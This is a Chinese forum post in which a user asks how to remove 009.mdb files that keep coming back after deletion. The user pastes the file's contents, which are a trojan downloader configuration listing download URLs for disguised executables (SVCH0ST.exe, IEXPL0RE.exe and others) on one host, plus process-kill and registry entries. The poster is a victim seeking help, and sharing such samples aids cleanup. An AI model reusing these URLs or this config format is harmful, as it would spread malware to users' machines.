和楼主问题一样,有009.mdb内容如下。已过滤“h2tp://testhtml28.zjidc.21qy.com/”,并且删除009.mdb和009[1].mdb 不过重启后还有009.mdb,009[1].mdb ,请教如何才能彻底清除这俩mdb文件。以前中过类似的,说是连qq的TIMplatform.exe感染了,当时也删了。后来消停了一段儿,最近又来了。真搞不懂这些mdb都是怎么回来的。
=======
[DOWNLOADNUMS]
updatetm=4
downfile=8
killproc=0
[STARTHTMPAGE]
;mainpage=http://www.sina.com.cn
[DOWNMAINLIST]
mainfile=http://testhtml28.zjidc.21qy.com/images/007.exe
[DOWNFILELIST]
downfile1=http://testhtml28.zjidc.21qy.com/images/ldas.exe
downfile2=http://testhtml28.zjidc.21qy.com/images/SVCH0ST.exe
downfile3=http://testhtml28.zjidc.21qy.com/images/IEXPL0RE.exe
downfile4=http://testhtml28.zjidc.21qy.com/images/SC0NFIG.exe
downfile5=http://testhtml28.zjidc.21qy.com/images/TIMPLATF0RM.exe
downfile6=http://testhtml28.zjidc.21qy.com/images/SPy.exe
downfile7=http://testhtml28.zjidc.21qy.com/images/IECONFIG.exe
downfile8=http://testhtml28.zjidc.21qy.com/images/MDCONFIG.EXE
[DOWNKILLLIST]
killproc1=CDPLAYER.EXE
[REMOVREGLIST]
removreg1=HKEY_LOCAL_MACHINE\SOFTWARE\C07ft5Y\WinXP*test
=======